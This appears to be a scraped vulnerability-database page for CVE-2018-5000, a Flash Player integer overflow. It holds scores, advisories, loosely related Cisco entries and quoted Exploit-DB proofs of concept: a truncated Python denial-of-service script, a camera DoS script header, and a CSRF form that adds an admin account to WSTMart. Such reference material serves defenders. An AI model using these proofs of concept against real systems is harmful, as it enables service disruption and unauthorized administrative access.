CVE-2018-5000
published 2018-07-09CVE-2018-5000: Adobe Flash Player versions 29.0.0.171 and earlier have an Integer Overflow vulnerability. Successful exploitation could lead to information disclosure.
PriorityP336medium6.5CVSS 3.0
AVNACLPRNUIRSUCHINAN
EPSS
14.49%
96.2th percentile
Adobe Flash Player versions 29.0.0.171 and earlier have an Integer Overflow vulnerability. Successful exploitation could lead to information disclosure.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | flash_player | <= 29.0.0.171 | — |
| adobe | flash_player_desktop_runtime | <= 29.0.0.171 | — |
| citrix | netscaler_adc_gateway | — | — |
| citrix | sd-wan | — | — |
| redhat | enterprise_linux_desktop | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_workstation | — | — |
CVSS provenance
nvdv3.06.5MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:P/I:N/A:N
osv6.5MEDIUM
vendor_cisco6.7MEDIUM
vendor_redhat6.5MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2x9x-c2fx-m574: Adobe Flash Player versions 29
ghsa_unreviewed·2022-05-14
CVE-2018-5000 [MEDIUM] CWE-190 GHSA-2x9x-c2fx-m574: Adobe Flash Player versions 29
Adobe Flash Player versions 29.0.0.171 and earlier have an Integer Overflow vulnerability. Successful exploitation could lead to information disclosure.
OSV
CVE-2018-5000: Adobe Flash Player versions 29
osv·2018-07-09·CVSS 6.5
CVE-2018-5000 [MEDIUM] CVE-2018-5000: Adobe Flash Player versions 29
Adobe Flash Player versions 29.0.0.171 and earlier have an Integer Overflow vulnerability. Successful exploitation could lead to information disclosure.
Cisco
Cisco 5000 Series Enterprise Network Compute System and Cisco UCS E-Series Servers BIOS Authentication Bypass Vulnerability
vendor_cisco·2018-06-20·CVSS 4.3
CVE-2018-0362 [MEDIUM] CWE-287 Cisco 5000 Series Enterprise Network Compute System and Cisco UCS E-Series Servers BIOS Authentication Bypass Vulnerability
Cisco 5000 Series Enterprise Network Compute System and Cisco UCS E-Series Servers BIOS Authentication Bypass Vulnerability
A vulnerability in BIOS authentication management of Cisco 5000 Series Enterprise Network Compute System and Cisco Unified Computing (UCS) E-Series Servers could allow an unauthenticated, local attacker to bypass the BIOS authentication and execute actions as an unprivileged user.
The vulnerability is due to improper security restrictions that are imposed by the affected system. An attacker could exploit this vulnerability by submitting an empty password value to an affected device's BIOS authentication prompt. An exploit could allow the attacker to have access to a restricted set of user-level BIOS commands.
There is a workaround that addresses this vulnerability.
Red Hat
flash-plugin: Information Disclosure vulnerabilities (APSB18-19)
vendor_redhat·2018-06-07·CVSS 6.5
CVE-2018-5000 [MEDIUM] flash-plugin: Information Disclosure vulnerabilities (APSB18-19)
flash-plugin: Information Disclosure vulnerabilities (APSB18-19)
Adobe Flash Player versions 29.0.0.171 and earlier have an Integer Overflow vulnerability. Successful exploitation could lead to information disclosure.
Cisco
Cisco StarOS IPsec Manager Denial of Service Vulnerability
vendor_cisco·2018-04-18·CVSS 5.3
CVE-2018-0273 [MEDIUM] CWE-399 Cisco StarOS IPsec Manager Denial of Service Vulnerability
Cisco StarOS IPsec Manager Denial of Service Vulnerability
A vulnerability in the IPsec Manager of Cisco StarOS for Cisco Aggregation Services Router (ASR) 5000 Series Routers and Virtualized Packet Core (VPC) System Software could allow an unauthenticated, remote attacker to terminate all active IPsec VPN tunnels and prevent new tunnels from being established, resulting in a denial of service (DoS) condition.
The vulnerability is due to improper processing of corrupted Internet Key Exchange Version 2 (IKEv2) messages. An attacker could exploit this vulnerability by sending crafted IKEv2 messages toward an affected router. A successful exploit could allow the attacker to cause the ipsecmgr service to reload. A reload of this service could cause all IPsec VPN tunnels to be terminated and
Cisco
Cisco StarOS CLI Command Injection Vulnerability
vendor_cisco·2018-03-07·CVSS 6.7
CVE-2018-0224 [MEDIUM] CWE-77 Cisco StarOS CLI Command Injection Vulnerability
Cisco StarOS CLI Command Injection Vulnerability
A vulnerability in the CLI of the Cisco StarOS operating system for Cisco ASR 5000 Series Aggregation Services Routers could allow an authenticated, local attacker to execute arbitrary commands with root privileges on an affected operating system.
The vulnerability is due to insufficient validation of user-supplied input by the affected operating system. An attacker could exploit this vulnerability by authenticating to an affected system and injecting malicious arguments into a vulnerable CLI command. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the affected system.
There are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://sec
Cisco
Cisco StarOS CLI Command Injection Vulnerability
vendor_cisco·2018-03-07·CVSS 6.5
CVE-2018-0217 [MEDIUM] CWE-77 Cisco StarOS CLI Command Injection Vulnerability
Cisco StarOS CLI Command Injection Vulnerability
A vulnerability in the CLI of the Cisco StarOS operating system for Cisco ASR 5000 Series Aggregation Services Routers could allow an authenticated, local attacker to perform a command injection attack on an affected system.
The vulnerability is due to insufficient validation of commands that are supplied to certain configurations in the CLI of the affected operating system. An attacker could exploit this vulnerability by injecting crafted arguments into a vulnerable CLI command for an affected system. A successful exploit could allow the attacker to insert and execute arbitrary commands in the CLI of the affected system. To exploit this vulnerability, the attacker would need to authenticate to an affected system by using valid administrat
Citrix
CVE-2018-5314: Command injection vulnerability in Citrix NetScaler ADC and NetScaler Gateway 11.0 before build 70.16, 11.1 before build 55.13, and 12.0 before build
vendor_citrix·2018-03-01·CVSS 7.5
CVE-2018-5314 [HIGH] CWE-287 CVE-2018-5314: Command injection vulnerability in Citrix NetScaler ADC and NetScaler Gateway 11.0 before build 70.16, 11.1 before build 55.13, and 12.0 before build
CVE-2018-5314: Command injection vulnerability in Citrix NetScaler ADC and NetScaler Gateway 11.0 before build 70.16, 11.1 before build 55.13, and 12.0 before build 53.13; and the NetScaler Load Balancing instance distributed with NetScaler SD-WAN/CloudBridge 4000, 4100, 5000 and 5100 WAN Optimization Edition 9.3.0 allows remote attackers to execute a system command or read arbitrary files via an SSH login prompt.
Cisco
Cisco StarOS for Cisco ASR 5000 Series Aggregation Services Routers File Overwrite Vulnerability
vendor_cisco·2018-02-08·CVSS 4.4
CVE-2018-0122 [MEDIUM] CWE-20 Cisco StarOS for Cisco ASR 5000 Series Aggregation Services Routers File Overwrite Vulnerability
Cisco StarOS for Cisco ASR 5000 Series Aggregation Services Routers File Overwrite Vulnerability
A vulnerability in the CLI of the Cisco StarOS operating system for Cisco ASR 5000 Series Aggregation Services Routers could allow an authenticated, local attacker to overwrite system files that are stored in the flash memory of an affected system.
The vulnerability is due to insufficient validation of user-supplied input by the affected operating system. An attacker could exploit this vulnerability by injecting crafted command arguments into a vulnerable CLI command for the affected operating system. A successful exploit could allow the attacker to overwrite or modify arbitrary files that are stored in the flash memory of an affected system. To exploit this vulnerability, the attacker would
Cisco
Cisco StarOS CLI Command Injection Vulnerability
vendor_cisco·2018-01-17·CVSS 6.7
CVE-2018-0115 [MEDIUM] CWE-78 Cisco StarOS CLI Command Injection Vulnerability
Cisco StarOS CLI Command Injection Vulnerability
A vulnerability in the CLI of the Cisco StarOS operating system for Cisco ASR 5000 Series routers could allow an authenticated, local attacker to execute arbitrary commands with root privileges on an affected host operating system.
The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by injecting malicious command arguments into a vulnerable CLI command. A successful exploit could allow the attacker to execute arbitrary commands with root privileges. To exploit this vulnerability, the attacker would need to authenticate to the affected system by using valid administrator credentials.
There are no workarounds that address this vulnerability.
This advisory is available at
Cisco
Cisco StarOS IPsec Manager Denial of Service Vulnerability
vendor_cisco·CVSS 3.0
CVE-2018-0273 Cisco StarOS IPsec Manager Denial of Service Vulnerability
CVE-2018-0273: Cisco StarOS IPsec Manager Denial of Service Vulnerability
A vulnerability in the IPsec Manager of Cisco StarOS for Cisco Aggregation Services Router (ASR) 5000 Series Routers and Virtualized Packet Core (VPC) System Software could allow an unauthenticated, remote attacker to terminate all active IPsec VPN tunnels and prevent new tunnels from being established, resulting in a denial of service (DoS) condition. The vulnerability is due to improper processing of corrupted Internet Key Exchange Version 2 (IKEv2) messages. An attacker could exploit this vulnerability by sending crafted IKEv2 messages toward an affected router. A successful exploit could allow the attacker to cause the ipsecmgr service to reload. A reload of this service could cause all IPsec VPN tunnels to be te
Cisco
Cisco StarOS CLI Command Injection Vulnerability
vendor_cisco·CVSS 3.0
CVE-2018-0217 Cisco StarOS CLI Command Injection Vulnerability
CVE-2018-0217: Cisco StarOS CLI Command Injection Vulnerability
A vulnerability in the CLI of the Cisco StarOS operating system for Cisco ASR 5000 Series Aggregation Services Routers could allow an authenticated, local attacker to perform a command injection attack on an affected system. The vulnerability is due to insufficient validation of commands that are supplied to certain configurations in the CLI of the affected operating system. An attacker could exploit this vulnerability by injecting crafted arguments into a vulnerable CLI command for an affected system. A successful exploit could allow the attacker to insert and execute arbitrary commands in the CLI of the affected system. To exploit this vulnerability, the attacker would need to authenticate to an affected system by using vali
Cisco
Cisco StarOS for Cisco ASR 5000 Series Aggregation Services Routers File Overwrite Vulnerability
vendor_cisco·CVSS 3.0
CVE-2018-0122 Cisco StarOS for Cisco ASR 5000 Series Aggregation Services Routers File Overwrite Vulnerability
CVE-2018-0122: Cisco StarOS for Cisco ASR 5000 Series Aggregation Services Routers File Overwrite Vulnerability
A vulnerability in the CLI of the Cisco StarOS operating system for Cisco ASR 5000 Series Aggregation Services Routers could allow an authenticated, local attacker to overwrite system files that are stored in the flash memory of an affected system. The vulnerability is due to insufficient validation of user-supplied input by the affected operating system. An attacker could exploit this vulnerability by injecting crafted command arguments into a vulnerable CLI command for the affected operating system. A successful exploit could allow the attacker to overwrite or modify arbitrary files that are stored in the flash memory of an affected system. To exploit this vulnerability, the at
Cisco
Cisco 5000 Series Enterprise Network Compute System and Cisco UCS E-Series Servers BIOS Authentication Bypass Vulnerability
vendor_cisco·CVSS 3.0
CVE-2018-0362 Cisco 5000 Series Enterprise Network Compute System and Cisco UCS E-Series Servers BIOS Authentication Bypass Vulnerability
CVE-2018-0362: Cisco 5000 Series Enterprise Network Compute System and Cisco UCS E-Series Servers BIOS Authentication Bypass Vulnerability
A vulnerability in BIOS authentication management of Cisco 5000 Series Enterprise Network Compute System and Cisco Unified Computing (UCS) E-Series Servers could allow an unauthenticated, local attacker to bypass the BIOS authentication and execute actions as an unprivileged user. The vulnerability is due to improper security restrictions that are imposed by the affected system. An attacker could exploit this vulnerability by submitting an empty password value to an affected device's BIOS authentication prompt. An exploit could allow the attacker to have access to a restricted set of user-level BIOS commands. There is a workaround that addresses this vu
Cisco
Cisco StarOS CLI Command Injection Vulnerability
vendor_cisco·CVSS 3.0
CVE-2018-0115 Cisco StarOS CLI Command Injection Vulnerability
CVE-2018-0115: Cisco StarOS CLI Command Injection Vulnerability
A vulnerability in the CLI of the Cisco StarOS operating system for Cisco ASR 5000 Series routers could allow an authenticated, local attacker to execute arbitrary commands with root privileges on an affected host operating system. The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by injecting malicious command arguments into a vulnerable CLI command. A successful exploit could allow the attacker to execute arbitrary commands with root privileges. To exploit this vulnerability, the attacker would need to authenticate to the affected system by using valid administrator credentials. There are no
CVSS: 3.0
CWE: CWE-78, CWE-78
Bug IDs: CSCvf93332
Cisco
Cisco StarOS CLI Command Injection Vulnerability
vendor_cisco·CVSS 3.0
CVE-2018-0224 Cisco StarOS CLI Command Injection Vulnerability
CVE-2018-0224: Cisco StarOS CLI Command Injection Vulnerability
A vulnerability in the CLI of the Cisco StarOS operating system for Cisco ASR 5000 Series Aggregation Services Routers could allow an authenticated, local attacker to execute arbitrary commands with root privileges on an affected operating system. The vulnerability is due to insufficient validation of user-supplied input by the affected operating system. An attacker could exploit this vulnerability by authenticating to an affected system and injecting malicious arguments into a vulnerable CLI command. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the affected system. There are no
CVSS: 3.0
CWE: CWE-77, CWE-77
Bug IDs: CSCvg38807
No detection rules found.
Exploit-DB
VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service
exploitdb·2019-08-30
VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service
VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service
---
# Exploit Title: VX Search Enterprise v10.4.16 DoS
# Google Dork: N/A
# Date: 17.01.2018
# Exploit Author: James Chamberlain [chumb0]
# Vendor Homepage: http://www.vxsearch.com/downloads.html
# Software Link: http://www.vxsearch.com/setups/vxsearchent_setup_v10.4.16.exe
# Version: v10.4.16
# Tested on: Windows 7 Home x86
# CVE : N/A
# Have been unable to overwrite SEH/EIP, but the crash serves as an unauthenticated DoS.
# Replication - Large buffer sent in the majority of Request Headers. PoC attached. Server needs http enabling (non default)
#!/usr/bin/python
import socket
pwnd = "A" * 5000
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.50.133', 80))
buf = ""
buf += "GET / HTTP/1.1" +
Exploit-DB
Sricam gSOAP 2.8 - Denial of Service
exploitdb·2019-01-28·CVSS 7.5
CVE-2019-6973 [HIGH] Sricam gSOAP 2.8 - Denial of Service
Sricam gSOAP 2.8 - Denial of Service
---
#!/bin/bash
#######################################################################################
#
# Exploit Title: Sricam gSOAP 2.8 - Denial of Service
# Date: 25/01/2019
# Vendor Status: Informed (24/10/2018)
# CVE ID: CVE-2019-6973
# Exploit Author: Andrew Watson
# Contact: https://keybase.io/bitfu
# Software Version: Sricam gSOAP 2.8
# Vendor Homepage: http://www.sricam.com/
# Tested on: Sricam IP CCTV Camera running gSOAP 2.8 on TCP/5000
# PoC Details: Sricam IP CCTV Camera's are vulnerable to denial of service,
# exploitable by sending multiple incomplete requests.
# References: https://github.com/bitfu/sricam-gsoap2.8-dos-exploit
#
# DISCLAIMER: This proof of concept is provided for educational purposes only!
#
#########################
Exploit-DB
WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
exploitdb·2018-12-24·CVSS 8.8
CVE-2018-19138 [HIGH] WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
---
# Exploit Title: WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-23
# Exploit Author: linfeng
# Vendor Homepage:https://github.com/wstmall/wstmart/
# Software Link:http://www.wstmart.net/
# Version: WSTMart 2.0.8_181212
# CVE :CVE-2018-19138
# 0x02 CSRF PoC
# 18/5000
# Function point: background management - staff management - login account
# poc:
# 1234.html
Document
test.staffId.value="0";
test.loginName.value="admin3";
test.staffPhoto.value="";
test.loginPwd.value="admin3";
test.staffName.value="admin3";
test.staffNo.value="";
test.RoleId.value="0";
test.staffPhone.value="";
test.wxOpenId.value="";
test.workStatus.value="1";
test.staffStatus.value="1";
test.submit();
Bugzilla
CVE-2018-5000 CVE-2018-5001 flash-plugin: Information Disclosure vulnerabilities (APSB18-19)
bugzilla·2018-06-07·CVSS 6.5
CVE-2018-5000 [MEDIUM] CVE-2018-5000 CVE-2018-5001 flash-plugin: Information Disclosure vulnerabilities (APSB18-19)
CVE-2018-5000 CVE-2018-5001 flash-plugin: Information Disclosure vulnerabilities (APSB18-19)
Adobe Security Bulletin APSB18-19 for Adobe Flash Player describes multiple flaws that can possibly lead to information disclosure when Flash Player is used to play a specially crafted SWF file:
Integer Overflow -- CVE-2018-5000
Out-of-bounds read -- CVE-2018-5001
External References:
https://helpx.adobe.com/security/products/flash-player/apsb18-19.html
Discussion:
This issue has been addressed in the following products:
Red Hat Enterprise Linux 6 Supplementary
Via RHSA-2018:1827 https://access.redhat.com/errata/RHSA-2018:1827
Bugzilla
CVE-2018-6058 chromium-browser: use-after-free in flash
bugzilla·2018-03-07·CVSS 9.8
CVE-2018-6058 [CRITICAL] CVE-2018-6058 chromium-browser: use-after-free in flash
CVE-2018-6058 chromium-browser: use-after-free in flash
An use after free flaw was found in the Flash component of the Chromium browser.
Upstream bug(s):
https://code.google.com/p/chromium/issues/detail?id=758848
External References:
https://chromereleases.googleblog.com/2018/03/stable-channel-update-for-desktop.html
Discussion:
Created chromium tracking bugs for this issue:
Affects: fedora-all [bug 1552502]
Affects: epel-7 [bug 1552504]
---
The Google blog post referenced in comment 0 was updated and no longer mentions this CVE. It now lists different CVE for this issue instead:
[$5000][758848] High CVE-2017-11215: Use after free in Flash. Reported by JieZeng of Tencent Zhanlu Lab on 2017-08-25
The CVE-2017-11215 is for Adobe Flash Player and it was previously covered by Adobe
Bugzilla
CVE-2018-6059 chromium-browser: use-after-free in flash
bugzilla·2018-03-07·CVSS 9.8
CVE-2018-6059 [CRITICAL] CVE-2018-6059 chromium-browser: use-after-free in flash
CVE-2018-6059 chromium-browser: use-after-free in flash
An use after free flaw was found in the Flash component of the Chromium browser.
Upstream bug(s):
https://code.google.com/p/chromium/issues/detail?id=758863
External References:
https://chromereleases.googleblog.com/2018/03/stable-channel-update-for-desktop.html
Discussion:
Created chromium tracking bugs for this issue:
Affects: fedora-all [bug 1552502]
Affects: epel-7 [bug 1552504]
---
The Google blog post referenced in comment 0 was updated and no longer mentions this CVE. It now lists different CVE for this issue instead:
[$5000][758863] High CVE-2017-11225: Use after free in Flash. Reported by JieZeng of Tencent Zhanlu Lab on 2017-08-25
The CVE-2017-11225 is for Adobe Flash Player and it was previously covered by Adobe
Zscaler
Zscaler protects against 4 new vulnerabilities for Adobe Flash Player. | Zscaler
blogs_zscaler
Zscaler protects against 4 new vulnerabilities for Adobe Flash Player. | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
http://www.securityfocus.com/bid/104413http://www.securitytracker.com/id/1041058https://access.redhat.com/errata/RHSA-2018:1827https://helpx.adobe.com/security/products/flash-player/apsb18-19.htmlhttps://security.gentoo.org/glsa/201806-02http://www.securityfocus.com/bid/104413http://www.securitytracker.com/id/1041058https://access.redhat.com/errata/RHSA-2018:1827https://helpx.adobe.com/security/products/flash-player/apsb18-19.htmlhttps://security.gentoo.org/glsa/201806-02
2018-07-09
Published